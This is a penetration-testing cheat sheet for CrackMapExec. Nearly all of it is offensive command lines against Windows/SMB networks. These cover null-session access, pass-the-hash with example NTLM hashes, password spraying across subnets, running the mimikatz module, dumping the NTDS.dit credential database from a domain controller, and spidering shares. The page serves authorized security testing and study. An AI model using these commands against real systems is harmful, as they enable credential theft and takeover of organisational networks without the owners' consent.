Crackmapexec

# Usage:
crackmapexec smb 192.168.1.1/24

# NULL Sessions
crackmapexec smb <target(s)> -u '' -p ''  

# Checking auth
crackmapexec smb 192.168.1.1/24 -u CoolAdmin -p ARealGoodPassword 

# Passing the hash
crackmapexec smb 192.168.1.1/24 -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B

# Running Modules
crackmapexec smb 192.168.1.1/24 -u Administrator -p Password1 -M mimikatz

# Enumerate shares
crackmapexec smb 192.168.1.1/24 -u Administrator -p Password1 --shares

# Enumerate domain users
cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users  

# Authentication + Checking Credentials (Domain)
# Failed logins result in a [-]
# Successful logins result in a [+] Domain\Username:Password

# User/Hash - Pass the HASH after obtaining credentials such as
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::

#You can use both the full hash or just the nt hash (second half)
cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'
cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'
cme smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'
cme smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'

# Continue to crack users and passwords
cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18 --continue-on-success  

# Dump the NTDS.dit file from target DC from secretsdump.py
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss

# Spider C:\ drive with txt in the name. This will search for user.txt and usertxt.html. The $ must be escaped
cme SMB 10.10.10.178 -u USER -p PASSWORD --spider C\$ --user txt  

# Mimikatz module
cme <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M mimikatz -o COMMAND='privilege::debug'

References:

https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/

https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference

https://blog.ropnop.com/practical-usage-of-ntlm-hashes/

Github: https://github.com/byt3bl33d3r/CrackMapExec/

PreviousEvil-winrmNextEmpire

Last updated